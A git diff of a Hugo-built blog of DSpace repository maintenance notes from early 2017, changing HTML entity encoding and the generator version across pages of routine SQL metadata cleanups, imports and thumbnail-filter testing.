<li>Many of the PDFs are 20, 30, 40, 50+ MB, which makes a total of 4GB</li>
<li>These are scanned from paper and likely have no compression, so we should try to test if these compression techniques help without comprimising the quality too much:</li>
@ -289,7 +289,7 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
<li>In testing a random sample of CIAT&rsquo;s PDFs for compressability, it looks like all of these methods generally increase the file size so we will just import them as they are</li>
<li>Import 232 CIAT records into CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/68704 --source /home/aorth/CIAT_232/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/68704 --source /home/aorth/CIAT_232/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
</code></pre><h2 id="2017-01-22">2017-01-22</h2>
<ul>
<li>Looking at some records that Sisay is having problems importing into DSpace Test (seems to be because of copious whitespace return characters from Excel&rsquo;s CSV exporter)</li>
@ -300,7 +300,7 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
<li>I merged Atmire&rsquo;s pull request into the development branch so they can deploy it on DSpace Test</li>
<li>Move some old ILRI Program communities to a new subcommunity for former programs (10568/79164):</li>
</ul>
<pre tabindex="0"><code>$ for community in 10568/171 10568/27868 10568/231 10568/27869 10568/150 10568/230 10568/32724 10568/172; do /home/cgspace.cgiar.org/bin/dspace community-filiator --remove --parent=10568/27866 --child=&quot;$community&quot; &amp;&amp; /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/79164 --child=&quot;$community&quot;; done
<pre tabindex="0"><code>$ for community in 10568/171 10568/27868 10568/231 10568/27869 10568/150 10568/230 10568/32724 10568/172; do /home/cgspace.cgiar.org/bin/dspace community-filiator --remove --parent=10568/27866 --child=&#34;$community&#34; &amp;&amp; /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/79164 --child=&#34;$community&#34;; done
</code></pre><ul>
<li>Move some collections with <a href="https://gist.github.com/alanorth/e60b530ed4989df0c731afbb0c640515"><code>move-collections.sh</code></a> using the following config:</li>
</ul>
@ -311,7 +311,7 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
<li>Run all updates on DSpace Test and reboot the server</li>
<li>Run fixes for Journal titles on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-49-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'password'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-49-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p &#39;password&#39;
</code></pre><ul>
<li>Create a new list of the top 500 journal titles from the database:</li>
</ul>

View File

@ -50,7 +50,7 @@ DELETE 1
Create issue on GitHub to track the addition of CCAFS Phase II project tags (#301)
Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -140,7 +140,7 @@ Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
<ul>
<li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = '80278';
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;;
id | collection_id | item_id
-------+---------------+---------
92551 | 313 | 80278
@ -166,7 +166,7 @@ DELETE 1
<li>The climate risk management one doesn&rsquo;t exist, so I will have to ask Magdalena if they want me to add it to the input forms</li>
<li>Start testing some nearly 500 author corrections that CCAFS sent me:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/CCAFS-Authors-Feb-7.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/CCAFS-Authors-Feb-7.csv -f dc.contributor.author -t &#39;correct name&#39; -m 3 -d dspace -u dspace -p fuuu
</code></pre><h2 id="2017-02-09">2017-02-09</h2>
<ul>
<li>More work on CCAFS Phase II stuff</li>
@ -219,51 +219,50 @@ DELETE 1
</code></pre><ul>
<li>And then a SQL command to update existing records:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'uri');
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://hdl.handle.net&#39;, &#39;https://hdl.handle.net&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;uri&#39;);
UPDATE 58193
</code></pre><ul>
<li>Seems to work fine!</li>
<li>I noticed a few items that have incorrect DOI links (<code>dc.identifier.doi</code>), and after looking in the database I see there are over 100 that are missing the scheme or are just plain wrong:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value not like 'http%://%';
<pre tabindex="0"><code>dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value not like &#39;http%://%&#39;;
</code></pre><ul>
<li>This will replace any that begin with <code>10.</code> and change them to <code>https://dx.doi.org/10.</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^10\..+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like '10.%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^10\..+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;10.%&#39;;
</code></pre><ul>
<li>This will get any that begin with <code>doi:10.</code> and change them to <code>https://dx.doi.org/10.x</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^doi:(10\..+$)', 'https://dx.doi.org/\1') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'doi:10%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;^doi:(10\..+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;doi:10%&#39;;
</code></pre><ul>
<li>Fix DOIs like <code>dx.doi.org/10.</code> to be <code>https://dx.doi.org/10.</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org/%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^dx.doi.org/.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;dx.doi.org/%&#39;;
</code></pre><ul>
<li>Fix DOIs like <code>http//</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^http//(dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http//%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;^http//(dx.doi.org/.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;http//%&#39;;
</code></pre><ul>
<li>Fix DOIs like <code>dx.doi.org./</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org\./.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org./%'
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^dx.doi.org\./.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;dx.doi.org./%&#39;
</code></pre><ul>
<li>Delete some invalid DOIs:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value in ('DOI','CPWF Mekong','Bulawayo, Zimbabwe','bb');
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value in (&#39;DOI&#39;,&#39;CPWF Mekong&#39;,&#39;Bulawayo, Zimbabwe&#39;,&#39;bb&#39;);
</code></pre><ul>
<li>Fix some other random outliers:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1016/j.aquaculture.2015.09.003' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:/dx.doi.org/10.1016/j.aquaculture.2015.09.003';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.5337/2016.200' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'doi: https://dx.doi.org/10.5337/2016.200';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/doi:10.1371/journal.pone.0062898' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Http://dx.doi.org/doi:10.1371/journal.pone.0062898';
dspace=# update metadatavalue set text_value = 'https://dx.doi.10.1016/j.cosust.2013.11.012' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:dx.doi.10.1016/j.cosust.2013.11.012';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1080/03632415.2014.883570' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'org/10.1080/03632415.2014.883570';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agron.colomb.v32n3.46052' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Doi: 10.15446/agron.colomb.v32n3.46052';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.1016/j.aquaculture.2015.09.003&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;http:/dx.doi.org/10.1016/j.aquaculture.2015.09.003&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.5337/2016.200&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;doi: https://dx.doi.org/10.5337/2016.200&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/doi:10.1371/journal.pone.0062898&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;Http://dx.doi.org/doi:10.1371/journal.pone.0062898&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.10.1016/j.cosust.2013.11.012&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;http:dx.doi.10.1016/j.cosust.2013.11.012&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.1080/03632415.2014.883570&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;org/10.1080/03632415.2014.883570&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.15446/agron.colomb.v32n3.46052&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;Doi: 10.15446/agron.colomb.v32n3.46052&#39;;
</code></pre><ul>
<li>And do another round of <code>http://</code> → <code>https://</code> cleanups:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http://dx.doi.org%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;http://dx.doi.org%&#39;;
</code></pre><ul>
<li>Run all DOI corrections on CGSpace</li>
<li>Something to think about here is to write a <a href="https://wiki.lyrasis.org/display/DSDOC5x/Curation+System#CurationSystem-ScriptedTasks">Curation Task</a> in Java to do these sanity checks / corrections every night</li>
@ -282,10 +281,10 @@ dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agro
</ul>
<pre tabindex="0"><code>$ python
Python 3.6.0 (default, Dec 25 2016, 17:30:53)
&gt;&gt;&gt; print('Entwicklung &amp; Ländlicher Raum')
&gt;&gt;&gt; print(&#39;Entwicklung &amp; Ländlicher Raum&#39;)
Entwicklung &amp; Ländlicher Raum
&gt;&gt;&gt; print('Entwicklung &amp; Ländlicher Raum'.encode())
b'Entwicklung &amp; L\xc3\xa4ndlicher Raum'
&gt;&gt;&gt; print(&#39;Entwicklung &amp; Ländlicher Raum&#39;.encode())
b&#39;Entwicklung &amp; L\xc3\xa4ndlicher Raum&#39;
</code></pre><ul>
<li>So for now I will remove the encode call from the script (though it was never used on the versions on the Linux hosts), leading me to believe it really <em>was</em> a temporary problem, perhaps due to macOS or the Python build I was using.</li>
</ul>
@ -294,11 +293,11 @@ b'Entwicklung &amp; L\xc3\xa4ndlicher Raum'
<li>Testing regenerating PDF thumbnails, like I started in 2016-11</li>
<li>It seems there is a bug in <code>filter-media</code> that causes it to process formats that aren&rsquo;t part of its configuration:</li>
</ul>
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16856 -p &quot;ImageMagick PDF Thumbnail&quot;
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16856 -p &#34;ImageMagick PDF Thumbnail&#34;
File: earlywinproposal_esa_postharvest.pdf.jpg
FILTERED: bitstream 13787 (item: 10568/16881) and created 'earlywinproposal_esa_postharvest.pdf.jpg'
FILTERED: bitstream 13787 (item: 10568/16881) and created &#39;earlywinproposal_esa_postharvest.pdf.jpg&#39;
File: postHarvest.jpg.jpg
FILTERED: bitstream 16524 (item: 10568/24655) and created 'postHarvest.jpg.jpg'
FILTERED: bitstream 16524 (item: 10568/24655) and created &#39;postHarvest.jpg.jpg&#39;
</code></pre><ul>
<li>According to <code>dspace.cfg</code> the ImageMagick PDF Thumbnail plugin should only process PDFs:</li>
</ul>
@ -317,8 +316,8 @@ filter.org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.inputFormats = A
<ul>
<li>Find all fields with &ldquo;<a href="http://hdl.handle.net">http://hdl.handle.net</a>&rdquo; values (most are in <code>dc.identifier.uri</code>, but some are in other URL-related fields like <code>cg.link.reference</code>, <code>cg.identifier.dataurl</code>, and <code>cg.identifier.url</code>):</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct metadata_field_id from metadatavalue where resource_type_id=2 and text_value like 'http://hdl.handle.net%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where resource_type_id=2 and metadata_field_id IN (25, 113, 179, 219, 220, 223) and text_value like 'http://hdl.handle.net%';
<pre tabindex="0"><code>dspace=# select distinct metadata_field_id from metadatavalue where resource_type_id=2 and text_value like &#39;http://hdl.handle.net%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://hdl.handle.net&#39;, &#39;https://hdl.handle.net&#39;) where resource_type_id=2 and metadata_field_id IN (25, 113, 179, 219, 220, 223) and text_value like &#39;http://hdl.handle.net%&#39;;
UPDATE 58633
</code></pre><ul>
<li>This works but I&rsquo;m thinking I&rsquo;ll wait on the replacement as there are perhaps some other places that rely on <code>http://hdl.handle.net</code> (grep the code, it&rsquo;s scary how many things are hard coded)</li>
@ -345,7 +344,7 @@ Certificate chain
<li>For some reason it is now signed by a private certificate authority</li>
<li>This error seems to have started on 2017-02-25:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;unable to find valid certification path&quot; [dspace]/log/dspace.log.2017-02-*
<pre tabindex="0"><code>$ grep -c &#34;unable to find valid certification path&#34; [dspace]/log/dspace.log.2017-02-*
[dspace]/log/dspace.log.2017-02-01:0
[dspace]/log/dspace.log.2017-02-02:0
[dspace]/log/dspace.log.2017-02-03:0
@ -381,7 +380,7 @@ Certificate chain
<li>The problem likely lies in the logic of <code>ImageMagickThumbnailFilter.java</code>, as <code>ImageMagickPdfThumbnailFilter.java</code> extends it</li>
<li>Run CIAT corrections on CGSpace</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = &#39;International Center for Tropical Agriculture&#39;;
</code></pre><ul>
<li>CGNET has fixed the certificate chain on their LDAP server</li>
<li>Redeploy CGSpace and DSpace Test to on latest <code>5_x-prod</code> branch with fixes for LDAP bind user</li>
@ -393,12 +392,12 @@ Certificate chain
<li>Ah, this is probably because some items have the <code>International Center for Tropical Agriculture</code> author twice, which I first noticed in 2016-12 but couldn&rsquo;t figure out how to fix</li>
<li>I think I can do it by first exporting all metadatavalues that have the author <code>International Center for Tropical Agriculture</code></li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select resource_id, metadata_value_id from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='International Center for Tropical Agriculture') to /tmp/ciat.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select resource_id, metadata_value_id from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;International Center for Tropical Agriculture&#39;) to /tmp/ciat.csv with csv;
COPY 1968
</code></pre><ul>
<li>And then use awk to print the duplicate lines to a separate file:</li>
</ul>
<pre tabindex="0"><code>$ awk -F',' 'seen[$1]++' /tmp/ciat.csv &gt; /tmp/ciat-dupes.csv
<pre tabindex="0"><code>$ awk -F&#39;,&#39; &#39;seen[$1]++&#39; /tmp/ciat.csv &gt; /tmp/ciat-dupes.csv
</code></pre><ul>
<li>From that file I can create a list of 279 deletes and put them in a batch script like:</li>
</ul>

View File

@ -54,7 +54,7 @@ Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing reg
$ identify ~/Desktop/alc_contrastes_desafios.jpg
/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600&#43;0&#43;0 8-bit CMYK 168KB 0.000u 0:00.000
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -180,9 +180,9 @@ $ identify ~/Desktop/alc_contrastes_desafios.jpg
<li>Somehow we need to detect the color system being used by the input file and handle each case differently (with profiles)</li>
<li>This is trivial with <code>identify</code> (even by the <a href="http://im4java.sourceforge.net/api/org/im4java/core/IMOps.html#identify">Java ImageMagick API</a>):</li>
</ul>
<pre tabindex="0"><code>$ identify -format '%r\n' alc_contrastes_desafios.pdf\[0\]
<pre tabindex="0"><code>$ identify -format &#39;%r\n&#39; alc_contrastes_desafios.pdf\[0\]
DirectClass CMYK
$ identify -format '%r\n' Africa\ group\ of\ negotiators.pdf\[0\]
$ identify -format &#39;%r\n&#39; Africa\ group\ of\ negotiators.pdf\[0\]
DirectClass sRGB Alpha
</code></pre><h2 id="2017-03-04">2017-03-04</h2>
<ul>
@ -196,7 +196,7 @@ DirectClass sRGB Alpha
<li>They want something like the items that are returned by the general &ldquo;LAND&rdquo; query in the search interface, but we cannot do that</li>
<li>We can only return specific results for metadata fields, like:</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;LAND REFORM&quot;, &quot;language&quot;: null}' | json_pp
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;LAND REFORM&#34;, &#34;language&#34;: null}&#39; | json_pp
</code></pre><ul>
<li>But there are hundreds of combinations of fields and values (like <code>dc.subject</code> and all the center subjects), and we can&rsquo;t use wildcards in REST!</li>
<li>Reading about enabling multiple handle prefixes in DSpace</li>
@ -212,11 +212,11 @@ DirectClass sRGB Alpha
<li>Because of this I noticed that our Handle server&rsquo;s <code>config.dct</code> was potentially misconfigured!</li>
<li>We had some default values still present:</li>
</ul>
<pre tabindex="0"><code>&quot;300:0.NA/YOUR_NAMING_AUTHORITY&quot;
<pre tabindex="0"><code>&#34;300:0.NA/YOUR_NAMING_AUTHORITY&#34;
</code></pre><ul>
<li>I&rsquo;ve changed them to the following and restarted the handle server:</li>
</ul>
<pre tabindex="0"><code>&quot;300:0.NA/10568&quot;
<pre tabindex="0"><code>&#34;300:0.NA/10568&#34;
</code></pre><ul>
<li>In looking at all the configs I just noticed that we are not providing a DOI in the Google-specific metadata crosswalk</li>
<li>From <code>dspace/config/crosswalks/google-metadata.properties</code>:</li>
@ -225,10 +225,10 @@ DirectClass sRGB Alpha
</code></pre><ul>
<li>This works, and makes DSpace output the following metadata on the item view page:</li>
</ul>
<pre tabindex="0"><code>&lt;meta content=&quot;https://dx.doi.org/10.1186/s13059-017-1153-y&quot; name=&quot;citation_doi&quot;&gt;
<pre tabindex="0"><code>&lt;meta content=&#34;https://dx.doi.org/10.1186/s13059-017-1153-y&#34; name=&#34;citation_doi&#34;&gt;
</code></pre><ul>
<li>Submitted and merged pull request for this: <a href="https://github.com/ilri/DSpace/pull/305">https://github.com/ilri/DSpace/pull/305</a></li>
<li>Submit pull request to set the author separator for XMLUI item lists to a semicolon instead of &ldquo;,&quot;: <a href="https://github.com/ilri/DSpace/pull/306">https://github.com/ilri/DSpace/pull/306</a></li>
<li>Submit pull request to set the author separator for XMLUI item lists to a semicolon instead of &ldquo;,&rdquo;: <a href="https://github.com/ilri/DSpace/pull/306">https://github.com/ilri/DSpace/pull/306</a></li>
<li>I want to show it briefly to Abenet and Peter to get feedback</li>
</ul>
<h2 id="2017-03-06">2017-03-06</h2>
@ -260,7 +260,7 @@ DirectClass sRGB Alpha
<ul>
<li>Export list of sponsors so Peter can clean it up:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship') group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;sponsorship&#39;) group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
COPY 285
</code></pre><h2 id="2017-03-12">2017-03-12</h2>
<ul>
@ -271,7 +271,7 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
</code></pre><ul>
<li>Generate a new list of unique sponsors so we can update the controlled vocabulary:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship')) to /tmp/sponsorship.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;sponsorship&#39;)) to /tmp/sponsorship.csv with csv;
</code></pre><ul>
<li>Pull request for controlled vocabulary if Peter approves: <a href="https://github.com/ilri/DSpace/pull/308">https://github.com/ilri/DSpace/pull/308</a></li>
<li>Review Sisay&rsquo;s roots, tubers, and bananas (RTB) theme, which still needs some fixes to work properly: <a href="https://github.com/ilri/DSpace/pull/307">https://github.com/ilri/DSpace/pull/307</a></li>
@ -325,11 +325,11 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
<ul>
<li>Dump a list of fields in the DC and CG schemas to compare with CG Core:</li>
</ul>
<pre tabindex="0"><code>dspace=# select case when metadata_schema_id=1 then 'dc' else 'cg' end as schema, element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
<pre tabindex="0"><code>dspace=# select case when metadata_schema_id=1 then &#39;dc&#39; else &#39;cg&#39; end as schema, element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
</code></pre><ul>
<li>Ooh, a better one!</li>
</ul>
<pre tabindex="0"><code>dspace=# select coalesce(case when metadata_schema_id=1 then 'dc.' else 'cg.' end) || concat_ws('.', element, qualifier) as field, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
<pre tabindex="0"><code>dspace=# select coalesce(case when metadata_schema_id=1 then &#39;dc.&#39; else &#39;cg.&#39; end) || concat_ws(&#39;.&#39;, element, qualifier) as field, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
</code></pre><h2 id="2017-03-30">2017-03-30</h2>
<ul>
<li>Adjust the Linode CPU usage alerts for the CGSpace server from 150% to 200%, as generally the nightly Solr indexing causes a usage around 150190%, so this should make the alerts less regular</li>

View File

@ -17,7 +17,7 @@ Quick proof-of-concept hack to add dc.rights to the input form, including some i
Remove redundant/duplicate text in the DSpace submission license
Testing the CMYK patch on a collection with 650 items:
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-04/" />
@ -38,9 +38,9 @@ Quick proof-of-concept hack to add dc.rights to the input form, including some i
Remove redundant/duplicate text in the DSpace submission license
Testing the CMYK patch on a collection with 650 items:
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -136,12 +136,12 @@ $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Th
<li>Remove redundant/duplicate text in the DSpace submission license</li>
<li>Testing the CMYK patch on a collection with 650 items:</li>
</ul>
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
</code></pre><h2 id="2017-04-03">2017-04-03</h2>
<ul>
<li>Continue testing the CMYK patch on more communities:</li>
</ul>
